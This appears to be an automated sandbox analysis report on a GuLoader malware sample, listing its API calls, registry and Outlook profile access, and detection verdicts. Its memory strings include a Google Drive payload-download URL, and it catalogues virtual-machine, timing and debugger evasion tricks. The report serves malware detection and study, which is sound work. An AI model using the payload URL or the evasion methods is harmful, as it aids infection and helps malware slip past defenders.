Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD4F3F NtWriteVirtualMemory, 0_2_02AD4F3F
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD4935 NtWriteVirtualMemory, 0_2_02AD4935
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD7D4A NtWriteVirtualMemory, 0_2_02AD7D4A
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 22_2_0056A07B Sleep,LdrInitializeThunk,NtProtectVirtualMemory, 22_2_0056A07B
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 22_2_00569F61 LdrInitializeThunk,NtProtectVirtualMemory, 22_2_00569F61
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 22_2_00569F54 LdrInitializeThunk,NtProtectVirtualMemory, 22_2_00569F54
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 22_2_00569F1A LdrInitializeThunk,LdrInitializeThunk,NtProtectVirtualMemory, 22_2_00569F1A
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 22_2_00569F18 LdrInitializeThunk,NtProtectVirtualMemory, 22_2_00569F18
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process Stats: CPU usage > 98%
Sample file is different than original file name gathered from version info
Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000000.00000000.222100367.000000000041D000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameFirnificat.exe vs SecuriteInfo.com.__vbaHresultCheckObj.22789.exe
Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000000.501841988.000000000041D000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameFirnificat.exe vs SecuriteInfo.com.__vbaHresultCheckObj.22789.exe
Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Binary or memory string: OriginalFilenameFirnificat.exe vs SecuriteInfo.com.__vbaHresultCheckObj.22789.exe
PE file contains strange resources
Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Virustotal: Detection: 23%
Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe ReversingLabs: Detection: 15%
Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe 'C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe'
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process created: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe 'C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe'
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process created: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe 'C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe' Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto Jump to behavior
Source: classification engine Classification label: mal100.rans.troj.spyw.evad.winEXE@3/2@2/3
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Mutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook Jump to behavior

Data Obfuscation:

barindex
Yara detected GuLoader
Source: Yara match File source: 00000000.00000002.503499325.0000000002AD0000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_00404CE7 push ebp; iretd 0_2_00404CE8
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_00403391 pushad ; retf 0_2_00403392
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect Any.run
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000000.00000002.503555930.0000000003370000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000002.732625102.0000000002270000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=16HJEQVA7VECQQXWXMEW5I0BX_HPCAORFWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKO
Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000000.00000002.503555930.0000000003370000.00000004.00000001.sdmp, SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000002.732625102.0000000002270000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe RDTSC instruction interceptor: First address: 000000000040BD3F second address: 000000000040BD3F instructions: 0x00000000 rdtsc 0x00000002 cmp bh, FFFFFFB8h 0x00000005 xor eax, edx 0x00000007 cmp al, F9h 0x00000009 dec edi 0x0000000a cmp esi, 000000C9h 0x00000010 fabs 0x00000012 jmp 00007F9C1C38B0F5h 0x00000014 cmp edi, 00000000h 0x00000017 jne 00007F9C1C38B016h 0x0000001d cmp cl, FFFFFFA5h 0x00000020 mov ebx, EA4B6B4Eh 0x00000025 cmp cx, 0065h 0x00000029 xor ebx, 08A587D2h 0x0000002f cmp ecx, 59h 0x00000032 xor ebx, 9719A8D1h 0x00000038 cmp bx, 005Ch 0x0000003c fldpi 0x0000003e jmp 00007F9C1C38B0F3h 0x00000040 xor ebx, 75B7444Dh 0x00000046 cmp ah, FFFFFFF0h 0x00000049 cmp ch, FFFFFFA0h 0x0000004c rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe TID: 6908 Thread sleep count: 71 > 30 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe TID: 6912 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe TID: 6912 Thread sleep time: -60000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD8186 rdtsc 0_2_02AD8186
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Window / User API: threadDelayed 1144 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Window / User API: threadDelayed 8856 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Thread delayed: delay time: 60000 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Thread delayed: delay time: 60000 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe System information queried: ModuleInformation Jump to behavior
Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000000.00000002.503555930.0000000003370000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000002.732429567.00000000008D8000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW
Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000002.732625102.0000000002270000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=https://drive.google.com/uc?export=download&id=16hJeQVa7vECqqXwxmeW5i0BX_hPCAorFwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000000.00000002.503555930.0000000003370000.00000004.00000001.sdmp, SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000002.732625102.0000000002270000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000002.732485311.0000000000924000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW0000

Anti Debugging:

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Thread information set: HideFromDebugger Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD8186 rdtsc 0_2_02AD8186
Enables debug privileges
